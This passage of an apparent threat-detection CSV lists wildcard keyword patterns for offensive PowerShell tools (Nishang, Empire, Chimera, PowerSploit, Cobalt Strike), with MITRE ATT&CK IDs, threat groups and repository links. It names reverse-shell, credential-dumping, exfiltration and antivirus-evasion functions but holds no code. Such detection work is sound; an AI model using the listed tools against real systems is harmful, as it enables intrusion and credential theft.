movement","https://github.com/p3nt4/Invoke-Piper","1","1","N/A","N/A","3","284","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" +"*Invoke-PiperServer*","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral movement","https://github.com/p3nt4/Invoke-Piper","1","1","N/A","N/A","3","284","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" +"*Invoke-PipeShell.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-PortBind*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Portscan*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-PortScan*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*Invoke-Portscan*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Portscan.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PortScan*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-Portscan*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-Portscan.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-Portscan.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1081","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PoshRatHttp*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*Invoke-PoshRatHttp*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PoshRatHttps*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PostExfil*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PostExfil.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PostExfil*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1142","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PowerDump*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*Invoke-PowerDump*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PowerDump*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1057","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PowerDump*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-PowerExtract*","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","1","99","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" +"*Invoke-PowerShellHistoryCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-PowerShellIcmp*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PowerShellIcmp.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*Invoke-PowerShellTcp*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-PowerShellTcp*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PowerShellTcp.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-PowerShellTcp.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*Invoke-PowerShellTcpOneLine*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PowerShellTcpOneLine.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*Invoke-PowerShellTcpOneLineBind*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PowershellTranscriptionCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-PowerShellUdp*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PowerShellUdp.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*Invoke-PowerShellUdpOneLine*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PowerShellUdpOneLine.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*Invoke-PowerShellWmi*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PowerThIEf*","offensive_tool_keyword","Invoke-PowerThIEf","An IE Post Exploitation Library released at Steelcon in Sheffield 7th July 2018.","T1027 - T1053 - T1114 - T1059 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/nettitude/Invoke-PowerThIEf","1","0","N/A","N/A","2","127","27","2018-09-12T11:26:06Z","2018-07-10T09:14:58Z" +"*Invoke-PPLDump*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Prasadhak*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PrintDemon*","offensive_tool_keyword","Invoke-PrintDemon","This is an PowerShell Empire launcher PoC using PrintDemon and Faxhell. The module has the Faxhell DLL already embedded which leverages CVE-2020-1048 for privilege escalation. The vulnerability allows an unprivileged user to gain system-level privileges and is based on @ionescu007 PoC.","T1204 - T1208 - T1216 - T1055 - T1203","TA0001 - TA0007 - TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/BC-SECURITY/Invoke-PrintDemon","1","1","N/A","N/A","2","193","41","2020-10-17T17:04:24Z","2020-05-15T05:14:49Z" +"*Invoke-PrintNightmareCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-Privesc*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-PrivescAudit*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-PrivescCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-PrivescCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-PrivescCheck.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*invokeprocesshunter*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*Invoke-ProcessHunter*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 